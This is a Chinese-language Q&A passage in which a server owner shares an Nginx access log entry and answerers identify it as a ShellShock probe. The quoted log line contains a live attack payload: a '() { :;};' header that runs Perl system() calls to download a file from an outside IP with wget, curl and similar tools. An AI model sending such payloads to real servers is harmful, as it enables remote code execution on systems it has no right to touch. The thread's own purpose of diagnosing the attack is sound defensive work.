粗略的 Nginx 访问日志条目

粗略的 Nginx 访问日志条目

nginx 访问日志中有不少如下所示的条目。我如何知道这些脚本的结果以及我的服务器是否受到攻击?

162.232.183.48 - - [14/Jan/2016:10:54:57 +0000] "GET /cgi-bin/php4 HTTP/1.1" 200 1494 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22 wget http://2
04.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232
.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  \x22);'" "-"

答案1

注意魔术字符串() { :; };。他们试图四处探查,看看你的服务器是否容易受到ShellShock 漏洞。这里使用Perl来打印并查看攻击是否成功。

测试你的服务器是否容易受到 ShellShock 攻击如果不是,您就清楚了。

也可以看看:我的服务器是否容易受到 perl 攻击?

答案2

他想对你进行攻击。有趣的是,他错误地配置了他的攻击。我捕获了恶意软件,但他的 wget/fetch/etc 失败了,因为他的包不存在 :-)

相关内容